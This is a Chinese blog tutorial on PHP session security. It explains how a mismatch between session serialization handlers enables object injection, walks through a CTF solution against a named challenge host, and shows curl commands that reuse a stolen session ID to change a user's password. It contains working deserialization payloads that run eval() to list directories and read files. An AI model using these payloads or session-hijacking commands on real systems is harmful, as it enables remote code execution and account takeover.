php中的session安全,介绍PHP的session反序列化漏洞

PHP session反序列化漏洞

PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生

什么是session

官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点:

  • session保存的位置是在服务器端
  • session通常是要配合cookie使用

因为HTTP的无状态性,服务端产生了session来标识当前的用户状态

本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**

PHP session工作流程

  • 以PHP为例,理解session的原理
  • PHP脚本使用 session_start()时开启session会话,会自动检测PHPSESSID

如果Cookie中存在,获取PHPSESSID

如果Cookie中不存在,创建一个PHPSESSID,并通过响应头以Cookie形式保存到浏览器

初始化超全局变量$_SESSION为一个空数组

PHP通过PHPSESSID去指定位置(PHPSESSID文件存储位置)匹配对应的文件

  • 存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_SESSION中
  • 不存在该文件: session_start()创建一个PHPSESSID命名文件

程序执行结束,将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中

具体原理图:

PHPSESSID

php.ini session配置

php.ini里面有较重要的session配置项

session.save_path=”/tmp” –设置session文件的存储位置

session.save_handler=files –设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数

session.auto_start= 0 –指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动

session.serialize_handler= php –定义用来序列化/反序列化的处理器名字,默认使用php

session.upload_progress.enabled= On –启用上传进度跟踪,并填充$ _SESSION变量,默认启用

session.upload_progress.cleanup= oN –读取所有POST数据(即完成上传)后立即清理进度信息,默认启用。

PHP session序列化机制

根据php.ini中的配置项,我们研究将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中,使用的三种不同的处理格式,即session.serialize_handler定义的三种引擎:

处理器 对应的存储格式
php 键名 + 竖线 + 经过 serialize() 函数反序列处理的值
php_binary 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值
php_serialize (php>=5.5.4) 经过 serialize() 函数反序列处理的数组

php处理器

首先来看看默认session.serialize_handler = php时候的序列化结果,代码如下

<?php//ini_set(‘session.serialize_handler’,’php’);session_start();$_SESSION[‘name’] = $_GET[‘name’];echo $_SESSION[‘name’];?>

phpsessid1

为了方便查看,将session存储目录设置为session.save_path = “/www/php_session” ,PHPSESSID文件如下

phpsessid3

1、文件名

文件名为sess_mpnnbont606f50eb178na451od,其中mpnnbont606f50eb178na451od就是后续请求头中Cookie携带的PHPSESSID的值 (如上图浏览器中已存储)

2、文件内容

php处理器存储格式

键名 竖线 经过 serialize() 函数反序列处理的值
$_SESSION[‘name’]的键名:name | s:6:“harden”;

php_binary处理器

使用php_binary处理器,即session.serialize_handler = php_binary

<?phpini_set(‘session.serialize_handler’,’php_binary’);session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION[‘namenamenamenamenamenamenamenamename’] = $_GET[‘name’];echo $_SESSION[‘namenamenamenamenamenamenamenamename’];?>

由于三种方式PHPSESSID文件名都是一样的,这里只需要查看文件内容

phpsessid2

键名的长度对应的 ASCII 字符 键名 经过 serialize() 函数反序列处理的值.
$ namenamenamenamenamenamenamenamename s:6:“harden”;

php_serialize 处理器

使用php_binary处理器,即session.serialize_handler = php_serialize

<?phpini_set(‘session.serialize_handler’,’php_serialize’);session_start();$_SESSION[‘name’] = $_GET[‘name’];echo $_SESSION[‘name’];?>

文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:”name”;s:6:”harden”;}

phpsessid3

session的反序列化漏洞利用

session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因

漏洞成因

首先创建session.php,使用php_serialize处理器来存储session数据

<?phpini_set(‘session.serialize_handler’,’php_serialize’);session_start();$_SESSION[‘session’] = $_GET[‘session’];echo $_SESSION[‘session’];?>

test.php,使用默认php处理器来存储session数据

<?phpsession_start();class f4ke{

public $name;

function __wakeup(){

echo “Who are you?”;

}

function __destruct(){

eval($this->name);

}}$str = new f4ke();?>

接着,我们构建URL进行访问session.php:

http://www.session-serialize.com/session.php?session=|O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}

phpsessid4

打开PHPSESSID文件可看到序列化存储的内容

a:1:{s:7:”session”;s:45:”|O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}

phpsessid5

漏洞分析:

在session.php程序执行,我们将|O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}通过php_serialize处理器序列化保存成PHPSESSID文件;

由于浏览器中保存的PHPSESSID文件名不变,当我们访问test.php,session_start();找到PHPSESSID文件并使用php处理器反序列化文件内容,识别格式即

键名 竖线 经过 serialize() 函数反序列处理的值
a:1:{s:7:“session”;s:45:” | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;}

php处理器会以|作为分隔符,将O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:

$_SESSION[‘session’] = new f4ke();$_SESSION[‘session’]->name = ‘phpinfo();’;

我们访问test.php,即可直接执行phpinfo()函数

7

CTF例题:PHPINFO

<?php//A webshell is wait for youini_set(‘session.serialize_handler’, ‘php’);session_start();class OowoO{

public $mdzz;

function __construct()

{

$this->mdzz = ‘phpinfo();’;

}

 

function __destruct()

{

eval($this->mdzz);

}}if(isset($_GET[‘phpinfo’])){

$m = new OowoO();}else{

highlight_string(file_get_contents(‘index.php’));}?>

我们可以看到ini_set(‘session.serialize_handler’, ‘php’),判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置

PHPSESSID8

可见php.ini中session.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件

补充知识

phpinfo文件中

local value(局部变量:作用于当前目录程序,会覆盖master value内容):php

master value(主变量:php.ini里面的内容):php_serialize

那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点

补充知识

当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS,如下图,即可写入$_SESSION,进一步序列化写入session文件

PHPSESSID9

下面是官方给出的一个文件上传时监测进度例子:

<form action=”upload.php” method=”POST” enctype=”multipart/form-data”>

<input type=”hidden” name=”<?php echo ini_get(“session.upload_progress.name”); ?>” value=”123″ /> <input type=”file” name=”file1″ />

<input type=”file” name=”file2″ />

<input type=”submit” /></form>

其中name=””也可以设置为name=”PHP_SESSION_UPLOAD_PROGRESS”

在session中存储的上传进度,如下所示:

<?php$_SESSION[“upload_progress_123”] = array(

“start_time” => 1234567890, // The request time 请求时间

“content_length” => 57343257, // POST content length 长度

“bytes_processed” => 453489, // Amount of bytes received and processed 已接收字节

“done” => false, // true when the POST handler has finished, successfully or not 是否上传完成

“files” => array(//上传的文件

0 => array(

“field_name” => “file1”, // Name of the <input/> field input中设定的变量名

// The following 3 elements equals those in $_FILES

“name” => “foo.avi”, //文件名

“tmp_name” => “/tmp/phpxxxxxx”,

“error” => 0,

“done” => true, // True when the POST handler has finished handling this file

“start_time” => 1234567890, // When this file has started to be processed

“bytes_processed” => 57343250, // Amount of bytes received and processed for this file

),

// An other file, not finished uploading, in the same request

1 => array(

“field_name” => “file2”,

“name” => “bar.avi”,

“tmp_name” => NULL,

“error” => 0,

“done” => false,

“start_time” => 1234567899,

“bytes_processed” => 54554,

),

));

其中,session中的field_name和name都是我们可控的输入点!

下面我们就开始解题拿到flag

首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置

PHPSESSID10

session.upload_progress.enabled = On –表明允许上传进度跟踪,并填充$ _SESSION变量

session.upload_progress.cleanup = Off –表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)

即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件

构造POST表单提交上传文件

<form action=”http://web.jarvisoj.com:32784/index.php” method=”POST” enctype=”multipart/form-data”>

<input type=”hidden” name=”PHP_SESSION_UPLOAD_PROGRESS” value=”123″ />

<input type=”file” name=”file” />

<input type=”submit” /></form>

构造序列化字符串作为payload(利用代码)

<?phpclass OowoO{

public $mdzz=’print_r(scandir(dirname(__FILE__)));’;}$obj = new OowoO();echo serialize($obj);?>//O:5:”OowoO”:1:{s:4:”mdzz”;s:36:”print_r(scandir(dirname(__FILE__)));”;}

为了防止”被转义,我们在payload中加入\

随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包

PHPSESSID11

并修改filename值为

|O:5:\”OowoO\”:1:{s:4:\”mdzz\”;s:36:\”print_r(scandir(dirname(__FILE__)));\”;}

发送请求包,代码执行过程分析:

PHPSESSID12

因此直接执行print_r(scandir(dirname(__FILE__)));并返回

PHPSESSID13

phpinfo查看当前目录,/opt/lampp/htdocs/

PHPSESSID14

构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容,即flag

PHPSESSID15

|O:5:\”OowoO\”:1:{s:4:\”mdzz\”;s:88:\”print_r(file_get_contents(\”/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\”));\”;}

php中的session安全

做PHP开发这么长时间,还真没有真正关注过安全的问题,每次都是以完成项目为主,最近在网上看到了一篇关于安全的文章,看完以后才注意到自己以前的项目都存在着很大的安全漏洞,于是挑了一个项目进行了测试,发现很容易就中招儿了。在这里我会分享自己写的一个测试的例子来说明PHP中的session是如何不安全的,以及在项目中如何加强其安全性。

对于session的原理机制,网上有很多好的文章来介绍,我们可以自行查阅。下面直接分享测试用的例子。

这个测试的例子主要就是一个登录页,登录成功以后可以修改密码,就这样一个简单的功能。

界面如下

PHPSESSID16

首先是在项目入口的地方使用函数 session_start() 开启了session。这样当客户端发起请求的时候,会产生一个身份标识 也就是 SessionID。通过cookie的方式保存在客户端,客户端和服务端每次的通信都是靠这个SessionID来进行身份识别的。

登录成功以后,会将 用户id、用户名存入session中
1
$_SESSION[‘userid’] = 用户id

$_SESSION[‘uname’] = 用户名

以后所有的操作都是通过判断 $_SESSION[‘userid’]是否存在来检查用户是否登录。代码如下:

if(isset($_SESSION[‘userid’])) return true;

对于修改密码接口的调用是通过ajax post的方式将数据传输到服务端的。

$.post(“接口*******”,
{
oldpass:oldpass,
newpass:newpass,
userid:uid,
},
function(data){
data = eval(‘(‘ +data+ ‘)’);
$(‘.grant_info’).html(infos[data.info]).show();
}
);

注意,我这里将这段代码写在了html页面中,所以说如果看到了html代码,也就知道了接口地址了。

修改密码的接口是这样实现的,首先是判断用户是否登录,如果登录才会进行密码的修改操作。

测试例子的实现思路大概就是上面介绍的那样。

利用SessionID攻击

1. 首先是获取SessionID,当然攻击者获取此标识的方式有很多,由于我的水平有限,至于如何获取我在这里不做介绍。我们可以模拟一下,先正常访问此项目,然后通过浏览器查看SessionID,以此得到一个合法的用户标识。可以在请求头中看到此项ID

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Connection: keep-alive

Cookie: Hm_lvt_bf1154ec41057869fceed66e9b3af5e7=1450428827,1450678226,1450851291,1450851486; PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7;

Host: ******

Referer: ******

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0

得到sessionID以后,如果此用户登录成功,那么服务端的session里就有此用户的信息了。

2. 获取到SessionID以后,假如攻击者已经知道修改密码的接口,就可以直接修改此用户的密码了。如果攻击者还没有得到接口地址,可以通过查看页面代码找出接口地址。可以使用如下的命令

#curl –cookie “PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7″ 页面地址

上面我们说过,在此例子中ajax代码是写在html页面中的,所以在此页面可以查看到接口地址

部分html代码如下

<html xmlns=”http://www.w3.org/1999/xhtml”>

<head>

……
var uid = $(“.userid”).val();
$.post(“/User/User/modifypass_do”,
{
oldpass:oldpass,
newpass:newpass,
userid:uid,
},
function(data){
data = eval(‘(‘ +data+ ‘)’);
$(‘.grant_info’).html(infos[data.info]).show();
}
);

……

<span><input type=”password” name=”oldpass” id=”textfield_o” placeholder=”原密码”></span>

<span><input type=”password” name=”newpass” id=”textfield_n” placeholder=”新密码”></span>

<span><input type=”password” name=”confirmpass” id=”textfield_c” placeholder=”确认密码”></span>

<input type=”button” class=”btn_ok” value=”确认修改” />

3. 得到接口以后可以通过curl 模拟post发送数据来修改密码

命令如下

# curl –cookie “PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7” -d oldpass=111111 -d newpass=000000 -d userid=用户id 接口地址

如果此用户已经登录,那么攻击者可以通过执行以上命令修改用户的密码。

解决方法

对于以上方式的攻击,我们可以通过使验证方式复杂化来加强其安全性。其中一种方式就是利用请求头中的User-Agent项来加强其安全性

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Connection: keep-alive

Cookie: Hm_lvt_bf1154ec41057869fceed66e9b3af5e7=1450428827,1450678226,1450851291,1450851486; PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7;

Host: ******

Referer: ******

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0

在项目开始的时候最初我们只是用了session_start()函数来开启session。现在我们可以在session_start() 下面 添加这段代码

$_SESSION[‘User_Agent’] = md5($_SERVER[‘HTTP_USER_AGENT’]);

然后在每次判断是否登录的时候,添加判断条件如下

If(isset($_SESSION[‘userid’]) && $_SESSION[‘User_Agent’] == md5($_SERVER[‘HTTP_USER_AGENT’])){
return true;
}

这样就可以避免上述简单的攻击。

总结:

当然,实际情况中的攻击远非这么简单,首先在获取SessionID这一步就比较困难,然后就是和服务端交互的代码尽量加密,可以避免上述的情况。在我们第二次修改代码以后,可以增加攻击的复杂程度,并不能杜绝攻击。攻击的方式多种多样,这里只是一种简单的方式,仅提供一种思路,但是原理是一样的,在实际情况中可以根据实际情况增强我们代码的安全程度。

本文来自投稿,不代表(钦钦技术栈)立场,如若转载,请注明出处:https://www.qin1qin.com/catagory/516/

(0)
上一篇 2022年6月26日 下午8:11
下一篇 2022年6月27日 下午12:22
软件定制开发公司

相关阅读

发表回复

登录后才能评论
通知:禁止投稿所有关于虚拟货币,币圈类相关文章,发现立即永久封锁账户ID!